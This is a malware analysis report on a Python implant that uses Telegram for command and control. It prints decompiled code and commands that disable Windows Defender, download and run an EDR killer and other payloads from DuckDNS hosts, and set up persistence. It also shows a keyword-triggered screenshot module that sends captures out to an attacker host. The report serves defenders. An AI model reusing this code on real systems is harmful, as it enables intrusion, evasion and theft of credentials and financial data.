Summary

The sample analyzed in this report is a Python-based malware implant that acts as a central controller for post-compromise activity. After execution, it establishes communication with attacker infrastructure over Telegram, performs environment checks to avoid analysis, and weakens host defenses by modifying Windows Defender and interfering with security tools. It supports delivery and execution of additional payloads, including RemcosRAT, QuasarRAT, and Formbook, using both embedded components and network retrieval. The malware uses multiple Telegram bots and channels to facilitate command and control (C2) communication. Analysis reveals a focus on maintaining access, updating components as needed, and enabling follow-on actions such as data collection, surveillance, and potential ransomware deployment. This behavior aligns with initial access operations commonly associated with Initial Access Brokers (IABs), posing a risk to enterprise environments that are targeted for their higher value and potential resale to other threat actors.

Analysis

Overview

This analysis focuses on the primary payload and its behavior following execution, rather than the initial infection chain. The previous report details how the malware gains access to the target system and establishes persistence prior to this stage.

The word.exe binary serves as the primary payload and operates as a modular Python-based implant responsible for orchestrating the deployment, execution, and maintenance of additional components. It supports remote tasking, payload delivery, update and recovery mechanisms, and post-compromise data collection through independently managed modules.

The payload was compiled using PyInstaller. This significantly simplifies analysis compared to traditional binaries, as the embedded Python bytecode can be extracted and decompiled to recover the original source. Most of the additional payloads retrieved by the implant were also compiled using PyInstaller, allowing for similar extraction and analysis.

Payloads were obfuscated using complex variable names, but all strings, including configuration values, are hardcoded in plaintext. So, simple variable replacement makes analysis simple.

Execution & Initialization

Once executed, the malware hides its own executable by modifying its file attributes using the Windows API call SetFileAttributesW (imported via ctypes.windll.kernel32) to set FILE_ATTRIBUTE_HIDDEN = 2. Additional attributes, including FILE_ATTRIBUTE_SYSTEM and FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, are also applied, making the file less visible and preventing its contents from being indexed by Windows Search. The goal is to reduce file visibility and make it less likely that a user becomes aware of the infection.

FILE_ATTRIBUTE_HIDDEN = 2
FILE_ATTRIBUTE_SYSTEM = 4
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192
INVALID_FILE_ATTRIBUTES = (-1)
def set_file_hidden_system_attrs(file_path_arg):
	file_path_wide = ctypes.c_wchar_p(file_path_arg)
	current_attrs = ctypes.windll.kernel32.GetFileAttributesW(file_path_wide)
	if current_attrs == INVALID_FILE_ATTRIBUTES:
		return False
	else:
		new_attrs = current_attrs | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED
		set_attr_result = ctypes.windll.kernel32.SetFileAttributesW(file_path_wide, new_attrs)
	if set_attr_result == 0:
		return False
	else:
		return True

Next, the malware takes some precautions as a means of simple sandbox evasion. It sleeps for 200 seconds (~3 minutes), preventing analysis of its behavior using online sandbox services that typically only last around 5 minutes.

Checks are also made to ensure it is running from C:\\Users\\Public\\Libraries or C:\\Users\\Public under an expected filename. If not, it sleeps for 8,000 seconds and alerts the operator via Telegram before exiting. This means it will silently fail if executed from the wrong path (e.g. by a sandbox).

The malware avoids infecting certain victim IDs which is most likely associated with ransomware deployment. The operator did not obfuscate variable names associated with this list using the value ransom_PC_list. If the currently infected machine generates an ID contained in this list, the malware self-destructs, cleaning up all deployed payloads before deleting itself. So, this is likely a whitelist of associates or affiliates of the same threat group/operation that prevents infection on their own machines. The list is retrieved using a pastebin link that is still active. Functionality supporting ransomware operations will be discussed in further detail later in this report.

#Original obfuscated function using the ransom_PC_List variable name
#get_ransom_target_white_list
def mfnfj():
    pastebin_raw_url = 'https://pastebin.com/raw/P8AeCKZQ'
    response = requests.get(pastebin_raw_url)
    if response.status_code == 200:
        content = response.text
        ransom_PC_list = content.split(sep=',')
        return ransom_PC_list
            except Exception:
                    return None
                    pass

Just before executing the main function, the malware enforces single-instance execution using a file-based locking mechanism. It creates a hidden lock file within a .google directory in the user’s home path and applies an exclusive non-blocking lock using the portalocker library. If the lock cannot be acquired, the process exits, preventing multiple concurrent executions and reducing the risk of detection from duplicate activity. Otherwise, execution continues on to the main_payload() function.

def run_with_lock():
    # irreducible cflow, using cdg fallback
    # ***<module>.run_with_lock: Failure: Compilation Error
    try:
        file_path = os.path.splitext(os.path.basename(sys.argv[0]))[0]
        home_tilde = '~'
        home_dir = pth.expanduser(home_tilde)
        if not os.path.exists(pth.join(home_dir, '.google')):
            os.mkdir(pth.join(home_dir, '.google'))
        lock_file_path = pth.join(home_dir, '.google', f'.{file_path}_lock')
    except Exception:
        pass
    with open(lock_file_path, 'w') as f:
        portalocker.lock(f, portalocker.LOCK_EX | portalocker.LOCK_NB)
        try:
            main_payload()
        except:
            pass
        portalocker.unlock(f)
        except (portalocker.exceptions.LockException, Exception):
            sys.exit(1)

This main function responsible for most of the malware’s behavior and begins by doing some additional cleanup of potential artifacts leftover from the loading and initialization phases:

def main_payload():
    try:
        verify_execution_context()
        hide_path(os.path.abspath(sys.argv[0]))
        delete_file('C:\\Users\\Public\\WindowsSearch.exe')
        ...

Following initial setup, communication is established with the operator by executing send_new_connection_beacon(), which transmits host-specific data including current version, the payload’s location on the machine, victim username, victim ID, session ID, and date of infection via a Telegram bot channel (see command and control section). If a file exists at C:\\Users\\Public\\check, the malware assumes it has ran before, and it does not send a new connection beacon.

bot = telebot.TeleBot(BOT_TOKEN_BEACON)
message = f"__#Count__ ```\nNew Connection 🥳🎉\n\nVersion: {get_version()}\nFile: {os.path.basename(sys.argv[0])}\nUser: {get_victim_id()}\nid = {SESSION_ID}\nDate: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}```"
def send_new_connection_beacon():
    if pth.isfile('C:\\Users\\Public\\check'):
        return
    else:
        try:
            bot.send_message(CHAT_ID_OPERATOR, message, parse_mode='Markdown')

To prevent redundant execution, checks for recent activity are made using a function named check_already_run_today(), ensuring the full infection chain is only executed once per day.

‍

Defense Evasion

Multiple techniques are employed for defense evasion including, Windows Defender tampering via PowerShell and command execution, a sequence of anti-analysis checks. artifact hiding, and EDR evasion. These tactics are designed to reduce host-based visibility, prevent analysis in sandboxed environments, and interfere with both native and third-party security controls.

The malware attempts to weaken Windows defender using drop_defender_bypass() , which writes and executes an embedded base64-encoded batch script that adds an exclusion for the entire C:\\Users directory in Windows Defender.

#decoded command embedded as base64 string
cmd.exe /c ... powershell.exe ... -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

The remaining defense evasion logic is implemented in the main_evasion_routine(). First, a series of Set-MpPreference commands are issued, disabling behavior monitoring while explicitly re-enabling real-time monitoring, controlled folder access, IOAV protection, and privacy mode. This is intentional and forces Windows Defender into a known "healthy" baseline state, preventing anomaly-based detections that may occur if protections are already partially disabled.

def main_evasion_routine():
    bot = telebot.TeleBot(BOT_TOKEN_MAIN_C2)
    try:
        hide_pdfs_and_js_in_public()
        hide_path('C:\\Users\\Public\\js.js')
        run_command_hidden('cmd /c powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true')
        run_command_hidden('cmd /c powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false')
        run_command_hidden('cmd /c powershell.exe Set-MpPreference -EnableControlledFolderAccess Enabled')
        run_command_hidden('cmd /c powershell.exe Set-MpPreference -DisableIOAVProtection $false')
        run_command_hidden('cmd /c powershell.exe Set-MpPreference -DisablePrivacyMode $false')
        sleep(60)
        ...

The malware then executes a centralized anti-analysis routine  that aggregates multiple detection mechanisms into a single decision point. Checks include:

• Analysis tool process enumeration
• Blacklisted DLLs and known sandbox artifacts
• Suspicious filenames and hostnames
• CPU, BIOS, and hardware profiling
• Registry and disk artifacts associated with virtualization
• VM-specific checks for VMware, VirtualBox, Parallels, Xen, and VirtualPC
• MAC address prefixes and driver/service indicators

If any detection condition is met, the implant hides staged payloads and enters a prolonged delay before exiting, preventing observable malicious behavior in analysis environments. Due to the length and complexity of this routine, the full set of checks is provided in the appendix.

Notably, a check is made to ensure the infected machine is not included in a hard coded list of machines. The variable name was obfuscated, but it the list most likely contains machines used for testing the full_post_compromise_routine() function without triggering anti-analysis checks.

def run_all_anti_analysis_checks():
    try:
        detected = False
        detection_results = []
        if get_login in DEV_MACHINE_EXCLUSIONS:
            full_post_compromise_routine()
            sleep(10)
            sys.exit(1)

If anti-analysis checks are all passed, it hides staged payload files in C:\Users\Public using the same hide_path() function used earlier on its own binary. Not every path here is guaranteed to exist, but these are the possible locations the staged malicious files could be located. File locations are determined by hard coded values contained within loading scripts (see previous report).

def main_evasion_routine():
    ...
        if run_all_anti_analysis_checks() == True:
            hide_path('C:\\Users\\Public\\storm.exe')
            hide_path('C:\\Users\\Public\\Libraries\\storm.exe')
            hide_path('C:\\Users\\Public\\WindowsLogon.exe')
            hide_path('C:\\Users\\Public\\Libraries\\WindowsLogon.exe')
            hide_path('C:\\Users\\Public\\dormant.exe')
            hide_path('C:\\Users\\Public\\WindowsGraphics.exe')
            hide_path('C:\\Users\\Public\\find.exe')
            hide_path('C:\\Users\\Public\\ProcessHost.exe')
            long_delay_and_exit(funC='the__main/main__antiAnalysis=True')
        else:
            send_edr_status_notification('started 🚀')
            hide_path('C:\\Users\\Public\\storm.exe')
            hide_path('C:\\Users\\Public\\Libraries\\storm.exe')
            hide_path('C:\\Users\\Public\\WindowsLogon.exe')
            hide_path('C:\\Users\\Public\\Libraries\\WindowsLogon.exe')
     ...

On systems that pass anti-analysis checks, the malware proceeds to degrade Windows Defender functionality. It suppresses user notifications by modifying the Defender Security Center notification registry key (Software\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.Defender.SecurityCenter):

reg_key_handle = winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.Defender.SecurityCenter')
value, _ = winreg.QueryValueEx(reg_key_handle, 'Enabled')

It also disables sample submission to prevent telemetry from being sent to Microsoft via PowerShell (-SubmitSamplesConsent 0):

command = 'cmd.exe /c PowerShell.exe -WindowStyle hidden -Command Set-MpPreference -SubmitSamplesConsent 0'
run_command_hidden(command)

Exclusions are used for file types used throughout the infection chain, including .exe, .js, .html, .vbs, .lnk, and. dll:

def main_evasion_routine():
    ...
    add_defender_extension_exclusion('exe')
    add_defender_extension_exclusion('js')
    add_defender_extension_exclusion('html')
    add_defender_extension_exclusion('vbs')
    add_defender_extension_exclusion('lnk')
    add_defender_extension_exclusion('dll')
    ...
    
def add_defender_extension_exclusion(extension_to_exclude):
    try:
        command = f'cmd.exe /c PowerShell.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension \'.{extension_to_exclude}\''
        run_command_hidden(command)

A path exclusion is added for C:\Users\:

command = 'cmd.exe /c PowerShell.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath \'C:\\\\Users\''
run_command_hidden(command)

Scheduled scanning is disabled entirely by setting the scan schedule to never run. Following these modifications, Windows event logs are cleared to remove evidence of execution.

def main_evasion_routine():
    ...
    disable_defender_scheduled_scan()
    clear_all_event_logs()
    ...

With Defender weakened, third-party security tools are targeted. An external utility is downloaded from attacker-controlled infrastructure and written it to C:\Users\Public\sshhhhh.exe, then executed in a blockedr mode. A second helper function invokes the same binary with a block "<target path>" argument, showing that this tool is used both as a general EDR suppression utility and as a targeted blocker against specific security executables. Based on the wrapper logic, this component is used to interfere with security product telemetry. However, because the binary itself was not reverse engineered, this assessment is based on the malware’s invocation logic and surrounding code rather than direct analysis.

def download_edr_silencer():
    file_path = 'C:\\Users\\Public\\sshhhhh.exe'
    url = 'http://nanocloudsystem.duckdns.org/secure/ssshhhh'
    response = requests.get(url, allow_redirects=True, timeout=90)
    with open(file_path, 'wb') as data:
        data.write(response.content)
    hide_path(file_path)

def run_edr_silencer_blocked_mode():
    edr_silencer_path = 'C:\\Users\\Public\\sshhhhh.exe'
    edr_command = f'"{edr_silencer_path}" blockedr'
    run_command_hidden(edr_command)

def run_edr_silencer_block(target_exe_path):
    edr_silencer_path = 'C:\\Users\\Public\\sshhhhh.exe'
    edr_command = f'"{edr_silencer_path}" block "{target_exe_path}"'
    run_command_hidden(edr_command)

A second external utility is downloaded from attacker-controlled infrastructure and written to C:\Users\Public\tornado.exe. This binary is used as the malware’s EDR and AV killer component. Installed security products are identified through WMIC and keyword searches across common installation directories. For each identified product, it attempts to locate matching executables, first applies the silencer function against the target path, and then executes tornado.exe against that binary. This represents a two-pronged approach to EDR/AV evasion where processes are suppressed at the network level and then terminated. This provides redundancy, so if one method fails, evasion is still possible. As with the silencer utility, the exact internal behavior of tornado.exe cannot be confirmed without separate analysis of the binary itself.

def download_edr_killer():
    file_path = 'C:\\Users\\Public\\tornado.exe'
    url = 'http://nanocloudsystem.duckdns.org/secure/killer'
    response = requests.get(url, allow_redirects=True, timeout=90)
    with open(file_path, 'wb') as data:
        data.write(response.content)
    hide_path(file_path)

def run_edr_killer(target_exe_path):
    edr_killer_path = 'C:\\Users\\Public\\tornado.exe'
    edr_command = f'"{edr_killer_path}" "{target_exe_path}"'
    run_command_hidden(edr_command)

def find_and_kill_av_edr():
    av_list = get_antivirus_list_wmic()[1]
    av_install_dirs = [
        'C:\\Program Files',
        'C:\\Program Files (x86)',
        'C:\\ProgramData',
        'C:\\ProgramData\\Microsoft',
        f"{os.getenv('LOCALAPPDATA')}\\Programs",
        'C:\\Program Files\\WindowsApps'
    ]

    for av_entry in av_list:
        av_name = av_entry.split(' ')[0]
        for path in av_install_dirs:
            search_and_run_edr_killer(path, av_name, True)
            search_and_run_edr_killer(path, 'Defender', False)

The EDR silencer is called using the file path of the Windows Malicious Software Removal Tool (MRT). This tool is targeted multiple times throughout the malware’s execution to ensure it is not capable of running and subsequently removing its access to the infected machine.

run_edr_silencer_block('C:\\Windows\\System32\\MRT.exe')

The Microsoft MRT is attacked again by modifying its Image File Execution Options (IFEO) registry key to induce a crash during execution, preventing it from running. This is achieved through a technique known as “stack rumbling,” where an abnormally large minimum stack memory allocation value (MinimumStackCommitInBytes) is configured. When the targeted process launches, it quickly becomes unstable and crashes due to excessive stack memory requirements. The tool is then disabled via policy and removed from disk to prevent recovery through Windows Update.

def main_evasion_routine():
    ...
    set_ifeo_registry('MRT.exe', 'MinimumStackCommitInBytes', 256256256)
    ...

‍

Command and Control (C2)

The malware uses Telegram’s Bot API as its primary C2 channel, supported by DuckDNS subdomains controlled by the operator. This design uses legitimate services to blend C2 traffic with normal HTTPS activity, reducing the effectiveness of network-based detection.

Multiple Telegram bots and chats are used for data exfiltration and to receive operator-issued commands and fallback C2 configurations. Hard coded DuckDNS subdomains serve as the primary hosting and payload delivery infrastructure. These C2 components, including bot tokens, chat IDs, and domains, are embedded directly within the sample, creating a static configuration that can be easily extracted and blocked, reducing operational resilience. The following table summarizes the key C2 components referenced throughout the remainder of the report:

For payload retrieval, the malware also implements a fallback mechanism in case the primary download URL fails. Across multiple helper functions, failed HTTP requests trigger a secondary retrieval attempt using a fallback C2 IP address (92.118.112[.]218) instead of the hard coded DuckDNS subdomain. This provides resilience and helps the malware continue execution if the primary infrastructure is unavailable or blocked.

#Example exception block from download_edr_silencer()
except Exception:
	url = f'http://{get_c2_ip()}/secure/ssshhhh'
	response = requests.get(url, allow_redirects=True, timeout=90)
		except Exception:
		delete_file(file_path)
	return

To avoid embedding the fallback IP directly in the sample, the malware retrieves it dynamically through the hard coded Telegram channel @veryifash.

‍

‍

The bot is used to obtain the description field of a Telegram channel, from which the malware parses the IP address and uses it for the secondary download attempt. This allows the operator to update fallback infrastructure without modifying the malware itself.

TG_C2_IP_RESOLVER_CHANNEL = '@veryifash'
def get_c2_ip():
    get_ip = read_c2_ip_channel()
    if get_ip is not None:
        try:
            payload_url = get_ip['ip']
            return payload_url
        except Exception:
            return None
    else:
        return None 
        
def read_c2_ip_channel():
    bot = telebot.TeleBot(BOT_TOKEN_TG_EXEC_1)
    try:
        chat_info = bot.get_chat(TG_C2_IP_RESOLVER_CHANNEL)
        channel_description = chat_info.description
        config_dict = {}
        for x in channel_description.split(','):
            key, value = x.split('=')
            config_dict[key] = value
        return config_dict
    except Exception as e:
        return None

‍

Payload Delivery & Execution

Local Cleanup & Preparation

Following completion of defense evasion and security suppression activities, execution transitions into full_post_compromise_routine(), which represents the primary operational phase of the malware. At this stage, the implant is executing from an already established persistence mechanism, has reduced host defenses, and has validated that it is not running in an analysis environment, allowing it to proceed with core functionalities, including data collection, payload deployment, and operator-driven tasking.

The routine begins by reorganizing attacker-controlled %APPDATA% directories, reapplying Defender suppression, and double checking staging paths are hidden. It also creates new nested working directories under C:\\Users\\Public\\Libraries\\Libraries.

make_dir('C:\\Users\\Public\\Libraries\\Libraries')
make_dir('C:\\Users\\Public\\Libraries\\Libraries\\Objects')
make_dir('C:\\Users\\Public\\Libraries\\Libraries\\Home')

The routine then removes older executables and link files from public staging paths, terminates selected processes, and deletes lock files and related artifacts. Notably, this part of the routine also kills and deletes any existing Remcos and Quasar RAT processes before redeploying an updated version later in the execution flow.

#Remove preiouvs staging artifacts and malicious payloads
kill_and_delete_exes_in_dir('C:\\Users\\Public\\Folder')
kill_and_delete_exes_in_dir('C:\\Users\\Public\\Home')
kill_and_delete_exes_in_dir('C:\\Users\\Public\\Office')
kill_and_delete_exes_in_dir('C:\\Users\\Public\\Objects')

#Kill any running Remcos/Quasar RAT processes; delete payloads from Home dir
kill_process('Remsw.exe')
kill_process('Quas.exe')
delete_file('C:\\Users\\Public\\Home\\Remsw.exe')
delete_file('C:\\Users\\Public\\Home\\Quas.exe')

#Same as above but removes qusar from the location C:\\Users\\Public\\Libraries\\Libraries\\Libraries\\Quas.exe
kill_and_delete_quas()

#Hide more artifacts
hide_files_by_extension('C:\\Users\\Public\\', '.pdf')
hide_files_by_extension('C:\\Users\\Public\\', '.zip')

#delete .lock and link files (used to make shortcuts to malicious payloads)
delete_files_by_extension('C:\\Users\\Public\\Libraries\\Libraries\\', '.lnk')
delete_files_by_extension('C:\\Users\\Public\\Libraries\\Libraries\\Objects', '.lnk')
delete_files_by_extension('C:\\Users\\Public\\Libraries\\', '.lnk')
delete_files_by_extension('C:\\Users\\Public\\', '.lnk')
delete_files_by_extension(f'{get_home_dir()}', '_lock')

‍

Telegram-Based Remote Execution

As introduced in the C2 section, Telegram channels are used as operator-controlled tasking mechanisms.

The payload invokes two Telegram-driven execution handlers that implement an operator-controlled payload delivery mechanism using the hard coded channels @tgexec1_bot and @tg_exec_2bot. Each handler queries its respective channel using a dedicated Telegram bot, reads the channel description field, and parses it into key value pairs that control execution, including User, Url, and Execute. The channel descriptions therefore act as the delivery vector for C2 commands.

TG_EXEC_1_CHANNEL = '@tgexec1_bot'
TG_EXEC_2_CHANNEL = '@tg_exec_2bot'

#Get description from telegram channel 
chat_info = bot.get_chat(TG_EXEC_1_CHANNEL)
channel_description = chat_info.description

#parse config values (URL, USER, EXECUTE)
for x in channel_description.split(','):
    key, value = x.split('=')
    config_dict[key] = value

The User field is compared against the generated victim ID, and execution proceeds only if it matches the current host or is set to All. So, the implant is capable of running commands on specific machines, or broad commands executed by all infected endpoints.

if channel_config.get('User') == get_victim_id() or channel_config.get('User') == 'All':

Prior to execution, the malware removes any previously deployed Telegram-delivered payloads, which follow the naming pattern TGExec-<random string>.exe, from C:\Users\Public\Libraries\Libraries. It then stages a new payload using the same naming convention and reports host metadata back to operator-controlled chat IDs. Commands sent via @tgexec1_bot send information to chat ID 595967844, while commands sent via @tg_exec_2bot send information to channel ID 5090743280.

CHAT_ID_OPERATOR = '595967844'
CHAT_ID_TG_EXEC_2 = '5090743280'

for x in os.listdir('C:\\Users\\Public\\Libraries\\Libraries'):
    if os.path.basename(x).startswith('TGExec'):
        delete_file('C:\\Users\\Public\\Libraries\\Libraries\\' + x)

#TG_EXEC_1_CHANNEL = '@tgexec1_bot'
system_info_msg = f"__#TGExecInfo__ ```\n{get_victim_id()} {('- All' if channel_config.get('User') == 'All' else '')}\nVersion: {get_version()}\nFile: {os.path.basename(sys.argv[0])}\nid = {SESSION_ID}\n--------\nSystem Uptime:\n{get_system_uptime().split('.')[0]}\n--------\nCheck Exist:\nExec All: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Folder\\MicrosoftCopilot.exe')}\nRemcos: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Home\\SecureSystem.exe')}\nQuasar: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Home\\ServiceAgent.exe')}\nWind Part: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Office\\MicrosoftAgent.exe')}\n```"
bot.send_message(CHAT_ID_OPERATOR, system_info_msg, parse_mode='Markdown')

#TG_EXEC_2_CHANNEL = '@tg_exec_2bot'
system_info_msg = f"__#TGExecInfo__ ```\n{get_victim_id()} {('- All' if channel_config.get('User') == 'All' else '')}\nVersion: {get_version()}\nFile: {os.path.basename(sys.argv[0])}\nid = {SESSION_ID}\n--------\nSystem Uptime:\n{get_system_uptime().split('.')[0]}\n--------\nCheck Exist:\nExec All: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Folder\\MicrosoftCopilot.exe')}\nRemcos: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Home\\SecureSystem.exe')}\nQuasar: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Home\\ServiceAgent.exe')}\nWind Part: {file_exists('C:\\Users\\Public\\Libraries\\Libraries\\Office\\MicrosoftAgent.exe')}\n```"
bot.send_message(CHAT_ID_TG_EXEC_2, system_info_msg, parse_mode='Markdown')

The telemetry sent to the operator includes the victim ID, execution scope (All if applicable), malware version, current filename, session ID, system uptime, and the presence of other staged payloads, specifically checks for MicrosoftCopilot.exe, SecureSystem.exe (Remcos), ServiceAgent.exe (Quasar), and MicrosoftAgent.exe.

If the Execute flag is set to True, the malware retrieves the payload using the URL field provided in the channel description and executes it.

if channel_config.get('Execute') == 'True':
		exec_file_path = f'C:\\Users\\Public\\Libraries\\Libraries\\TGExec-{random_string(4)}.exe'
    download_and_run(payload_url, file_path=exec_file_path)

‍

Embedded Payload Deployment

The following functions write embedded base64-encoded payload blobs to disk, verify them using a known hash, execute them, and hide them. The payloads were extracted and submitted for analysis where they were identified as the QuasarRAT and RemcosRAT. This confirms the implant functions as a loader for additional payloads including QuasarRAT and RemcosRAT.

deploy_quasar_rat()
deploy_remcos_rat()

Later in the execution chain, additional components retrieved via LaunchExecAll.exe and MicrosoftCopilot.exe also deploy and maintain Remcos and Quasar payloads using network-based retrieval. This results in two parallel deployment paths:

• Embedded deployment: ensures initial execution of RAT components without requiring network access
• Network-based deployment: allows retrieval of updated or replacement payloads from attacker-controlled infrastructure

Network-Based Payload Delivery

This stage also introduces a network-based payload delivery path through LaunchExecAll.exe. The component retrieves the file WindowMain from attacker-controlled infrastructure in the same fashion as all other remote payloads. It writes it to the disk under the name MicrosoftCopilot.exe. MicrosoftCopilot.exe is a Python-based orchestration layer that that retrieves and launches multiple follow-on payloads, including Remcos (SecureSystem.exe) and Quasar (ServiceAgent.exe). LaunchExecAll.exe ensures persistence of this orchestrator so if RAT infections are removed, they can be redeployed.

# Downloads and executes LaunchExecAll.exe -> Downloads and stages MicrosoftCopilot.exe 
download_and_run_launch_exec()

Further evidence of Remcos RAT attribution beyond detection signatures is observed in the malware’s payload handling and execution logic. The network-based retrieval routine downloads a file from operator-controlled infrastructure named rem and writes it to a staging directory as SecureSytem.exe. This is followed by explicit checks for the presence of that file and status messages such as “Remcos is not running on…” when it is absent. This shows clear awareness of and dependency on a Remcos payload, indicating the malware is designed to deploy and manage RemcosRAT rather than functioning as a generic loader for arbitrary payloads.

if GbjtkU('SecureSystem.exe') == False:
	try:
		GnVMPHq(tOlRH=f'```INFO\nVersion: {aWDccwU()}\nRemcos is not running on {ESZvG}```')

Similar logic is implemented for Quasar RAT. The malware checks for the presence of the deployed Quasar payload and logs status messages indicating whether it is running, mirroring the behavior observed with Remcos.

The RemcosRat payloads slightly differ and the network-based file is likely an updated version with the embedded payload acting as a fallback for when network traffic is blocked. A full analysis of the binaries was not performed, but their configurations were extracted in plaintext:

Other than the RATs, the MicrosoftCopilot.exefile retrieves four other payloads responsible for updating malicious payloads, executing operator commands, screen surveillance of infected machines, and credential harvesting.

The WindowScan component, deployed as RandExec.exe, functions as an update and redeployment utility for previously staged payloads. It retrieves a version value from the Telegram channel @veryifash and compares it against file version metadata of known binaries. Components that fall below the operator-defined version threshold are terminated and removed from disk. The module then downloads the primary payload from /secure/find and stages it across multiple locations using filenames such as find.exe, printer.exe, WindowsGraphics.exe, and WindowsLogon.exe under C:\\Users\\Public and related subdirectories. It also modifies file attributes to hide staged payloads and contains logic to remove or recreate Startup folder artifacts, allowing persistence to be reset or re-established.

The ServiceBroker component, deployed as ServiceBroker.exe, implements remote payload execution using the same Telegram-based tasking model as the TGExec components. It uses the channels @angel_update and @angel_updatesbot to retrieve execution parameters from channel description fields, including User, Url, and Execute. Tasks are applied either to specific hosts or globally based on the User value. When execution is enabled, the module downloads the payload from the supplied URL, deletes prior staged files, writes the payload to C:\\Users\\Public\\Libraries\\Libraries\\CleanExec-<random>.exe, and executes it. It also reports host metadata and payload presence back to operator-controlled chat IDs.

WindowPart, deployed as MicrosoftAgent.exe, is a keyword-triggered screenshot and window monitoring module that continuously inspects the foreground window title and initiates collection when the title contains any string from a hard coded keyword list associated with financial services, cryptocurrency platforms, authentication flows, and sensitive user actions. When a match occurs, it captures a full-screen screenshot, logs the timestamp, victim identifier, and window title, and exfiltrates the same data over a raw TCP connection to destroyer56.duckdns.org:5555 .

screenshot_keywords = ['cripto', 'code', 'verification', 'revix', 'ovex', '2fa', 
'valr', 'market', 'auth', 'trad', 'bit', 'note', 'Gemini', 'online', 'secure', 
'digital', 'crypto', 'card', 'coin', 'bank', 'checkout', 'pay', 'visa', 'wallet', 
'blockchain', 'transact', 'confidential', 'recover', 'phrase', 'key', 'ethereum', 
'transfer', 'sign', 'wire', 'log', 'cart', 'pass', 'password', 'btc', 'private', 
'seed', 'secret', 'Booking', 'exodus', 'binance', 'luno']

Search.exe is a file directly embedded in MicrosoftCopilot.exe using a base64-encoded blob. While we did not conduct a full analysis of the file, multiple detection engines flagged it as the FormBook information stealing malware.

The code also attempts to retrieve and write another payload under the names pictures.exe and shawdows.exe . The target file /secure/backup was not found on the attacker server, so analysis was not done on these binaries.

‍

Persistence Mechanisms

Scheduled Task Persistence

The malware establishes persistence through multiple scheduled tasks created within legitimate Windows task paths. These tasks are configured to execute daily, run with elevated privileges, and remain hidden from the user.

Each scheduled task retrieves payloads from attacker-controlled DuckDNS infrastructure, executes them, and restarts the WindowsAudioSupport service. This behavior ensures that core malware components are continuously re-established, even if removed or disrupted.

The use of multiple tasks with legitimate naming conventions provides redundancy and reduces the likelihood of detection. Even if one persistence mechanism is removed, others remain active, enabling continued access and payload execution.

run_command_hidden('cmd /c powershell $taskName = \'WindowsColorTable\'; ... $action.Path = \'w.exe\'; $action.Arguments = \'C:\\Windows\\sys.js; Start-Service -Name \"WindowsAudioSupport\"\'; ...')
run_command_hidden('cmd /c powershell $taskName = \'WindowsDefinedUpdate\'; ... Invoke-WebRequest http://rootfolder.duckdns.org/secure/dormant1 -Outfile C:\\Users\\Public\\dormant.exe; Start-Process -NoNewWindow -FilePath C:\\Users\\Public\\dormant.exe; ...')
run_command_hidden('cmd /c powershell $taskName = \'WindowsUpdate\'; ... Invoke-WebRequest http://uploadcommit.duckdns.org/secure/dormant2 -Outfile C:\\Users\\Public\\WindowsHost.exe; Start-Process -NoNewWindow -FilePath C:\\Users\\Public\\WindowsHost.exe; ...')
run_command_hidden('cmd /c powershell $taskName = \'WindowsSecureLogon\'; ... Invoke-WebRequest http://nanocloudsystem.duckdns.org/secure/find -Outfile C:\\Users\\Public\\Libraries\\printer.exe; Start-Process -NoNewWindow -FilePath C:\\Users\\Public\\Libraries\\printer.exe; ...')
run_command_hidden('cmd /c powershell $taskName = \'WindowsColorChecker\'; ... Invoke-WebRequest http://nanocloudsystem.duckdns.org/secure/find -Outfile C:\\Users\\Public\\WindowsGraphics.exe; Start-Process -NoNewWindow -FilePath C:\\Users\\Public\\WindowsGraphics.exe; ...')

‍

Run Key and Shortcut Persistence

Persistence is established beyond its scheduled task execution through Run key modifications and .url shortcut files.

set_registry_run_key(
    reg_key_name='Task Manager',
    key_data='C:\\Users\\Public\\Libraries\\Libraries\\Objects\\Task Manager.url',
    autostart=True
)
create_url_shortcut(
    'C:\\Users\\Public\\Libraries\\Libraries\\Objects\\Task Manager.url',
    'C:\\Users\\Public\\Libraries\\Libraries\\Objects\\NotepadService.exe'
)

set_registry_run_key(
    reg_key_name='Windows Security Update',
    key_data='C:\\Users\\Public\\Libraries\\Libraries\\Folder\\OneDriveMainUpdate.url',
    autostart=True
)

‍

Service-Based Persistence

The routine removes a prior service and establishes a new auto-start service backed by C:\Windows\WindowsAudio.exe. This creates a service-level persistence mechanism independent of the Run keys and scheduled tasks.

run_command_hidden('sc.exe stop WindowsLogon')
run_command_hidden('sc.exe delete WindowsLogon')
delete_file('C:\\Windows\\WindowsLogon.exe')

update_windows_audio_service()

run_command_hidden('sc.exe create WindowsAudioSupport binPath=\"C:\\Windows\\WindowsAudio.exe\" type=own start=auto')
run_command_hidden('sc.exe start WindowsAudioSupport')
run_command_hidden('sc.exe failure WindowsAudioSupport reset= 0 actions= restart/5000')

Task Hijacking via storm.js

Another payload is retrieved using the download_and_inject_storm_js() function. Following download, the script is used to modify existing scheduled tasks through a task hijacking mechanism. The TaskHijacker component does not create new tasks. Instead, it connects to the Task Scheduler COM service, recursively enumerates existing tasks, and selects tasks already configured to run with elevated privileges or under administrative users. Tasks using LogonType = 5 are excluded, and duplicate injection is avoided by checking whether the same action path and arguments are already present.

The component then appends a new execution action that invokes the script using Wscript.exe. The script is written into an NTFS alternate data stream (C:\\:storm.js), after which the original file is removed from disk.

file_path = 'C:\\Users\\Public\\Libraries\\storm.js'
url = 'http://nanocloudsystem.duckdns.org/secure/winfuck'
